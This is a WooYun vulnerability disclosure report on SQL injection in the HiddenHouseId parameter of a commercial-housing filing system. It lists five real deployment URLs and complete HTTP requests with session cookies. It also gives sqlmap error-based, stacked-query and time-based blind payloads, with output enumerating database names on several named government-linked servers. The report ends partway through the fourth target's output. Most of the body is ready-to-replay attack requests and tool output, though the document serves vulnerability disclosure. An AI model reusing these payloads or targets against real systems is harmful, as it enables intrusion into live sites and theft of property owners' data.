
Vulnerability Summary

Defect ID: wooyun-2014-078357

Title: SQL injection vulnerability in a widely deployed property filing system

Vendor: 重庆光大网络公司 (Chongqing Guangda Network Company)

Author: Mr.leo

Submitted: 2014-10-11 15:57

Fixed: 2015-01-09 15:58

Disclosed: 2015-01-09 15:58

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure timeline:

2014-10-11: Details sent to the vendor; awaiting vendor action
2014-10-16: Vendor confirmed the issue; details visible to the vendor only
2014-10-19: Details opened to third-party security partners
2014-12-10: Details disclosed to core white hats and domain experts
2014-12-20: Details disclosed to ordinary white hats
2014-12-30: Details disclosed to intern white hats
2015-01-09: Details disclosed to the public

Brief description:

BOOM!!

Details:

Baidu search keyword: 本站由重庆光大网络公司提供技术支持 ("this site is technically supported by 重庆光大网络公司")
The online commercial-housing contract signing and filing system developed by 重庆光大网络技术有限公司 (Chongqing Guangda Network Technology Co., Ltd.).



Five deployments are listed below to show that the issue is generic to the product rather than specific to one site:
http://222.86.207.241/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx
The HiddenHouseId parameter of the POST request is not filtered, which leads to SQL injection.
1. POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Content-Length: 893
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.86.207.241/index.aspx
Cookie: ASP.NET_SessionId=kedieu2bmqnkem3lt3ihn455; showloupan=new; FORMSAUTHCOOKIE=912F853B6EDF4602099C9709FB041047A17B078B79A7CCE2DBADB9D5122D580186C74A5577A30E2196CE7C8DB46219C86609F64FAF1724013EE047EFE52C13779949A88F8629BFE7637B2E50A7A9E8FC; CheckCode=R6462
Host: 222.86.207.241
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptManager1%7CBtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtType=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2FwEWEgLgr%2FPxAQK%2F1IjCDgL5%2BLqdCQLIr5%2FACALQysnjAwLPj%2B2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC%2FqSOOvj61ago0XVbyzDyVM%3D&__VIEWSTATE=%2FwEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS%2Frui1hOmHkeS4muS4u%2BafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg%3D%3D
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 3266=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(110)+CHAR(105)+CHAR(5
8)+(SELECT (CASE WHEN (3266=3266) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHA
R(112)+CHAR(113)+CHAR(98)+CHAR(58))) AND ('HzaP'='HzaP&hiddenId=&hplusMoney=0.00
&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptM
anager1=ScriptManager1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=
e&TxtReal=&TxtType=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALI
DATION=/wEWEgLgr/PxAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2
pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC
/qSOOvj61ago0XVbyzDyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9k
FgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0
ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNS
ZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0
.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptMa
nager1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtTy
pe=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLgr
/PxAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2
fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC/qSOOvj61ago0XVb
yzDyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUB
GOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8P
FgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJh
Y2tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.0
0&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&ScriptManager1=ScriptMana
ger1|BtnShowOneOwnerInfo&time=&TxtAuto=&TxtHouseId=e&TxtIdNum=e&TxtReal=&TxtType
=&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLgr/P
xAQK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb
4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeUjivC/qSOOvj61ago0XVbyz
DyVM=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGO
e7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFg
IfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2
tLZXlfXxYBBQxJQnRuU2VhcmNoT0tNJI19qgXyT0mJikHjkBJvNBeEkg==
---
[17:40:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:40:52] [INFO] fetching database names
[17:40:57] [INFO] the SQL query used returns 15 entries
[17:42:50] [INFO] fetching number of databases
[17:42:50] [INFO] retrieved:
[17:42:50] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[17:43:17] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[17:43:17] [ERROR] unable to retrieve the number of databases
[17:43:22] [INFO] retrieved: RepairHouseFund
[17:43:27] [INFO] retrieved: master
[17:43:33] [INFO] retrieved: tempdb
[17:43:37] [INFO] retrieved: model
[17:43:42] [INFO] retrieved: msdb
[17:43:47] [INFO] retrieved: ReportServer
[17:43:52] [INFO] retrieved: ReportServerTempDB
[17:43:57] [INFO] retrieved: House
[17:44:02] [INFO] retrieved: ASPState
[17:44:07] [INFO] retrieved: house_image1
[17:44:12] [INFO] retrieved: House_New
[17:44:16] [INFO] retrieved: house_telinfo
[17:44:22] [INFO] retrieved: House_TmpHk
[17:44:26] [INFO] retrieved: House_Data
[17:44:31] [INFO] retrieved: RepairHouseFund
[17:44:36] [INFO] retrieved: House_old
2. POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Content-Length: 828
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx
Cookie: ASP.NET_SessionId=cps1qa451anibd55dzvkubfv
Host: www.dyfgs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg%3d%3d
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLp/5q3BwK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeyzZn3dt4cRHc8vMijn2Rv2TxZQc=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0u7kh5K6u8UmpgQTJ5Eel4WUqOCrg==
---
available databases [41]:
[*] @
[*] [House_DzdaIm\x04q]
[*] [House_DzdaImg139\x05}]
[*] ASPState
[*] fcgl
[*] HoDq
[*] hosue_dy
[*] Houqe_DzdaImg12A
[*] house
[*] house_ch
[*] House_DzdaIag138
3. POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 783
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=ptaucuvphlrr1255w1zz2545
Host: www.ysfgj.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLBlMagBAK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeRMBQXBSV98AxJB0MuvuPErqMjmk%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uo21B0Cq4ONoFrqrIhCK5e%2bTz6Mw%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 1297=CONVERT(INT,(CHAR(58)+CHAR(97)+CHAR(112)+CHAR(109)+CHAR(58
)+(SELECT (CASE WHEN (1297=1297) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR
(98)+CHAR(112)+CHAR(117)+CHAR(58))) AND ('PTfq'='PTfq&hiddenId=&hplusMoney=0.00&
hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSear
chOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUME
NT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLBlMagBAK/1IjCDgL5+LqdCQLIr5/ACALQysn
jAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5f
DCQLl7LSbDAKsjPiFBgKFuZQeRMBQXBSV98AxJB0MuvuPErqMjmk=&__VIEWSTATE=/wEPDwULLTExNj
Y0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivom
QCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAi
sPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uo21
B0Cq4ONoFrqrIhCK5e+Tz6Mw==
---
[09:25:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:25:09] [INFO] fetching database names
[09:25:14] [INFO] the SQL query used returns 71 entries
[09:25:23] [WARNING] reflective value(s) found and filtering out
[09:35:46] [INFO] retrieved: repairhousefund_ys
[09:35:51] [INFO] retrieved: master
[09:35:56] [INFO] retrieved: tempdb
[09:36:01] [INFO] retrieved: model
[09:36:06] [INFO] retrieved: msdb
[09:36:11] [INFO] retrieved: ReportServer
[09:36:15] [INFO] retrieved: ReportServerTempDB
[09:36:23] [INFO] retrieved: ASPState
[09:36:28] [INFO] retrieved: House_ZSHouse
[09:36:33] [INFO] retrieved: house_old
[09:36:38] [INFO] retrieved: House_DzdaImg1
[09:36:43] [INFO] retrieved: house_yy
[09:36:47] [INFO] retrieved: House_OldHouse
[09:36:52] [INFO] retrieved: repairhousefund_ys
[09:36:57] [INFO] retrieved: zfbz
[09:37:02] [INFO] retrieved: House_DzdaImg10
[09:37:07] [INFO] retrieved: house_Eavl
[09:37:12] [INFO] retrieved: House_DzdaImg11
[09:37:17] [INFO] retrieved: House_DzdaImg12
[09:37:22] [INFO] retrieved: House_DzdaImg13
[09:37:26] [INFO] retrieved: House_DzdaImg14
[09:37:32] [INFO] retrieved: House_DzdaImg15
[09:37:36] [INFO] retrieved: House_DzdaImg16
[09:37:41] [INFO] retrieved: House_DzdaImg17
[09:37:46] [INFO] retrieved: House_DzdaImg18
[09:37:51] [INFO] retrieved: House_DzdaImg19
[09:37:56] [INFO] retrieved: House_DzdaImg2
[09:38:01] [INFO] retrieved: House_DzdaImg20
[09:38:06] [INFO] retrieved: House_DzdaImg21
[09:38:10] [INFO] retrieved: House_Telinfo
[09:38:16] [INFO] retrieved: House_DzdaImg22
[09:38:21] [INFO] retrieved: House_DzdaImg23
[09:38:25] [INFO] retrieved: House_DzdaImg3
[09:38:30] [INFO] retrieved: House_DzdaImg4
[09:38:35] [INFO] retrieved: House_DzdaImg5
[09:38:40] [INFO] retrieved: House_DzdaImg6
[09:38:45] [INFO] retrieved: House_DzdaImg7
[09:38:50] [INFO] retrieved: House_DzdaImg8
[09:38:54] [INFO] retrieved: House_DzdaImg9
4. POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 783
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=puimkc55mwvvb1rtkqrju0eg
Host: www.zylzfc.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLd9%2bnDBQK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeAQGG6wKrTKTu6HUfjksiL4m4xHE%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uNcF4ENH7hIoFBuwamC0W4foylvA%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1'); WAITFOR DELAY '0:0:5';--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0
.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&Tx
tAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARG
ET=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3L
qNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjP
iFBgKFuZQeTamt6G1z5+OyrqwqEBhs4hfVisk=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeB
FVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWC
gIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFH
l9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6+Zv77PjBNc7R5A
QNJwm86qQ==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') WAITFOR DELAY '0:0:5'--&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.0
0&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtA
uto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET
=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5+LqdCQLIr5/ACALQysnjAwLPj+2oDwKo3LqN
CQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiF
BgKFuZQeTamt6G1z5+OyrqwqEBhs4hfVisk=&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFV
zZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivomQCEw9kFgJmD2QWCgI
XDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9
fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6+Zv77PjBNc7R5AQN
Jwm86qQ==
---
[09:36:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
